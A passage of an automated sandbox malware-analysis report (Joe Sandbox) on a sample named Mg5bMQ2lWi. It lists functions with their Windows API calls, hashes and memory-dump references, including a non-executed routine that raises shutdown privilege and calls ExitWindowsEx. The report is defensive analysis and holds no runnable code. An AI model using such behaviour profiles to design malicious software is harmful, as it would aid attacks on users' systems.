Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F

Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9

Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98

Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428

Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676

Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F

Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,02087CA0,0040A08C,00000000), ref: 004076B3

Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666

Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519

Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00407019), ref: 0040700C

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B

Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
Instruction Fuzzy Hash:

Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00407558

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D

Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

Non-executed Functions

Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 00409457
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3

Strings

SeShutdownPrivilege, xrefs: 0040946F

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F

Function 00409BEC Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E

Function 00405248 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748

Function 00405CE4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A

Function 0040840C Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55

Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1

Strings

GetUserDefaultUILanguage, xrefs: 00407043
Locale, xrefs: 00407090
kernel32.dll, xrefs: 00407048
Control Panel\Desktop\ResourceLocale, xrefs: 004070B0
.DEFAULT\Control Panel\International, xrefs: 00407078

Memory Dump Source

Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
